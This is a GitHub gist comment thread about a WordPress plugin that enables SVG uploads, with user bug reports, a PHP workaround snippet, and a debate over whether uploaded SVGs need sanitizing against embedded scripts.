Skip to content

Instantly share code, notes, and snippets.

@Lewiscowles1986
Last active August 4, 2016 13:45
Show Gist options
  • Save Lewiscowles1986/44f059876ec205dd4d27 to your computer and use it in GitHub Desktop.
Save Lewiscowles1986/44f059876ec205dd4d27 to your computer and use it in GitHub Desktop.
SVG Media Plugin for WordPress (Works since 4.1.2!)
<?php
// Please see https://github.com/Lewiscowles1986/WordPressSVGPlugin from now on
@georgestephanis
Copy link

As I commented on twitter, please please add a caveat for current_user_can( 'unfiltered_html' ) -- allowing arbitrary svg uploads that could contain malicious scripts within the svgs is super scary.

ref: http://blog.guya.net/2014/02/17/svg-for-fun-and-phishing/

@Lewiscowles1986
Copy link
Author

Hey guys,

@Dragonspence, apologies, I wont be supporting PHP 5.2 or 5.3,, they should not be used in production in 2015, anyone providing these versions to customers or their boss without a disclaimer in my opinion is doing their clients and or boss harm. I moved to PHP5.4 in 2012, and am now working with 5.5 and 5.6, so I don't support anything less than 5.4 as a matter of professional standards, and if asked to support 5.3 code specifically, I issue a disclaimer as part of professional conduct; but you are right, anyone else can add, it's pretty simple, not too big a deal. I am also pretty sure my function cannot be used anywhere else, but they should have mb_string replace if being used in any install with UTF-8 containing WordPress core files 😊

@georgestephanis, I wrote about this on the WordPress Trac. SVG is not the only format that allows this, I view it as needlessly restrictive, and the job of a good antivirus & malware suite, but https://github.com/grok/wordpress-plugin-scalable-vector-graphics seems to have some form of sanitization in his more feature-filled plugin (the sanitization AFAIK), which I am told will have 4.0 support brought in from this plugin soon ;). It also seems to have 5.3 support. I would say to anyone concerned about this, you are assuming and accepting within your plans uploads of content from people either not paying due diligence, or people who represent more of a security threat than just uploading SVG files with malicious elements. I would consider this, and move your scanner / sanitize to a background daemon with inotify of file changes so a report and remittance could be pursued (different approach entirely)

@gcupat
Copy link

gcupat commented Apr 20, 2015

This is a great! Just what I needed. I did notice something and I am not sure if it is just me, but when enable the plugin I can upload SVG, but then I can't upload jpg's giving me an error message "Sorry, this file type is not permitted for security reasons". Is there something that I am missing?
Thanks, in advance

@tomyorkey
Copy link

I have the same problem. Jpg's can't be uploaded for some reason. Any suggestions? Thanks!

@Kateriine
Copy link

Hello, same here, and for png's too. Here a solution that seems to work

add_action('admin_init', 'add_svg_upload');
function add_svg_upload() {
add_filter('upload_mimes', 'svg_upload_mimes');
ob_start();

add_action('shutdown', function() {
$final = '';
$ob_levels = count(ob_get_level());
for ($i = 0; $i < $ob_levels; $i++) {
$final .= ob_get_clean();
}
echo apply_filters('final_output', $final);
}, 0);
add_filter('final_output', function($content) {
$content = str_replace('<# } else if ( 'image' === data.type && data.sizes && data.sizes.full ) { #>',
'<# } else if ( 'svg+xml' === data.subtype ) { #>

<# } else if ( 'image' === data.type && data.sizes && data.sizes.full ) { #>',
$content
);
$content = str_replace(
'<# } else if ( 'image' === data.type && data.sizes ) { #>',
'<# } else if ( 'svg+xml' === data.subtype ) { #>




<# } else if ( 'image' === data.type && data.sizes ) { #>',
$content
);
return $content;
});
}
function svg_upload_mimes($existing_mimes=array()){
$existing_mimes['svg'] = 'image/svg+xml';
return $existing_mimes;
}

@Lewiscowles1986
Copy link
Author

Oh hey guys, didn't see your comments there. JPG and PNG work from 4.1.2 until the most recent version, please check your other plugins and theme first ;)

Also I noticed the only mod was to existing_mimes being passed to the function, please link code in gists, you can fork them and it looks much better. I Have added it in as it does look like $mimes is appearing from nowhere, but it seems to work... strange.

@telemarker
Copy link

hey lewis,
great plugin!
still there are things need to be done to make it perfect:
– if i add a svg to the tinymce field like a normal picture the height is 1 x 1 px
i tried many things with the first point but somehow my admin css does not grab the image in the tinymce at all.

@Lewiscowles1986
Copy link
Author

Hey buddy,

weird for sure, just checked it out, the 1px x 1px error is WP internal, but I'll see what I can do to remit.

@telemarker
Copy link

any news on this?

@telemarker
Copy link

hey lewis did you check on this issue, it not a small one if you want to use svg in your site content.

@Lewiscowles1986
Copy link
Author

@telemarker, the 1px x 1px is probably a problem with your CSS rules, you may need to pass new rules to tinyMCE about your grid or container CSS

@Lewiscowles1986
Copy link
Author

Update to give multiple 🖕 to WP 4.5+ new custom logo incompatibility

@goldnate
Copy link

Umm, I tried to activate and got this exception:

Plugin could not be activated because it triggered a fatal error.

Parse error: syntax error, unexpected '[' in /nas/content/staging/cpsbop/wp-content/plugins/lc-svg-upload.php on line 15

Advice?

@ameliemelo1
Copy link

Yes, Goldnate, I have the same problem. I had to revert back to plugin version 1.4.

@cfxd
Copy link

cfxd commented Jul 15, 2016

@goldnate @SBGUY your server is running an outdated version of PHP. Replace [] with array().

@Lewiscowles1986
Copy link
Author

@SBGUY @goldnate if you are running old PHP I'm afraid you'll have to edit as @cfxd says. I've deliberately used new array syntax to encourage users to update their stack or not use.

@grok
Copy link

grok commented Jul 28, 2016

Just weighing in here -- I decided to remove the sanitization from my plugin mentioned above. The goal of the plugin is to enable the easy utilization of SVG, not to provide safety.

I think security plugins could do a better job about scanning files and such for that. I've chosen to narrow the focus of my plugin 😃

@Lewiscowles1986
Copy link
Author

@grok, thanks for the update, I really do like what you have done with your plugin. Checkout the GitHub repo for some third-party contributed code (merge maybe?)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment